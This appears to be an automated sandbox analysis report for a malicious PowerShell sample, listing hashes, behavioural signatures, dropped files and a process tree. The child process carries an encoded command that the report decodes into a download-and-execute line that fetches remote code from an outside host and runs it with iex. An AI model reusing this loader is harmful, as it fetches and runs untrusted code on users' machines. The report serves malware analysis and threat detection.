Analysis
max time kernel: 150s
max time network: 153s
platform: windows7_x64
resource: win7v20210410
submitted: 25-08-2021 20:27
Static task: static1

Behavioral tasks (task: sample / resource)
behavioral1: 4bd/472-84-0x000000001A910000-0x000000001A919000-memory.dmp.dll / win7v20210408
behavioral2: 4bd/472-84-0x000000001A910000-0x000000001A919000-memory.dmp.dll / win10v20210410
behavioral3: 4bd/Attachment.png.lnk / win7v20210408
behavioral4: 4bd/Attachment.png.lnk / win10v20210410
behavioral5: Attachment.png.lnk / win7v20210408
behavioral6: Attachment.png.lnk / win10v20210410
behavioral7: work.ps1 / win7v20210410
behavioral8: work.ps1 / win10v20210408
behavioral9: 4bd/ldr.dat.ps1 / win7v20210410
behavioral10: 4bd/ldr.dat.ps1 / win10v20210408
behavioral11: 4bd/work.ps1 / win7v20210410
behavioral12: 4bd/work.ps1 / win10v20210408
General
Target: work.ps1
Size: 1.4MB
MD5: 7ba4b5c5d3e3276a3cfe8d581cf7173b
SHA1: 79ba87b46562e75f097c1b6d23d3b63b9160bbaa
SHA256: 73737bf28fa00ea1380bf98a76f6c2ff34bf25e8b489750acccc45df8e898022
SHA512: ccccc4402edc1c333f2b11955b4c2850f5b68674e473d57521cb009e2047a46f9c57c0151b9191d4a2e3b10931723d0191bba9b299ffb3bb293ff7d6f83598c6
Malware Config

Signatures
Blocklisted process makes network request (1 IoC)
  flow 7, pid 1680, powershell.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid 1844, powershell.exe
  pid 1680, powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, pid 1844, powershell.exe
  Token: SeDebugPrivilege, pid 1680, powershell.exe
Suspicious use of WriteProcessMemory (3 IoCs)
  PID 1844 (powershell.exe) wrote to memory of PID 1680 (powershell.exe), recorded three times
Processes
1. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1844)
   Command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\work.ps1
   Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1680), child of PID 1844
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==
      Decoded -enc argument (UTF-16LE base64, decoded here for readability): $M=[Net.WebRequest]::Create('http://athingcalledcake.com/file');$t=$M.GetResponse();$R=$t.GetResponseStream();$F=new-object IO.StreamReader $R;$p=$F.ReadToEnd();iex($p);
      Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Downloads
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: c7da0296f2ff751db2bee1f60fb96bc3
  SHA1: 2027adc7aad82b7f9ceb790ae5f8fea3aa49ceec
  SHA256: 5bbff7738e03fd10bd8b47e0ed86a2400d7d52a46cadc41be3a723ed5d0b69ab
  SHA512: 17aad10d420cb59cd8eba8b64f5167f53fe8a6cd9a7b9e52cd53a4aa4b111bf73451828648013ef81aec3bcddb10754d536bbfff4425424381b7b670e751dce3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: f18b2cecdb2f0b19a56a5fa4b254b7e0
  SHA1: 893597d400792a642b2e7fee41c3bdf3f5062347
  SHA256: 3bb174406252dcb336f52f43807b7d1906782c7aa2af753c63726d0066020738
  SHA512: b06139db7aa51c415f6f3860a02965c787242d895a03222159362075f8eb94f8ee8b1af9b228153017335757df4019b52a8ac261be4f517b5f5af5517965cd81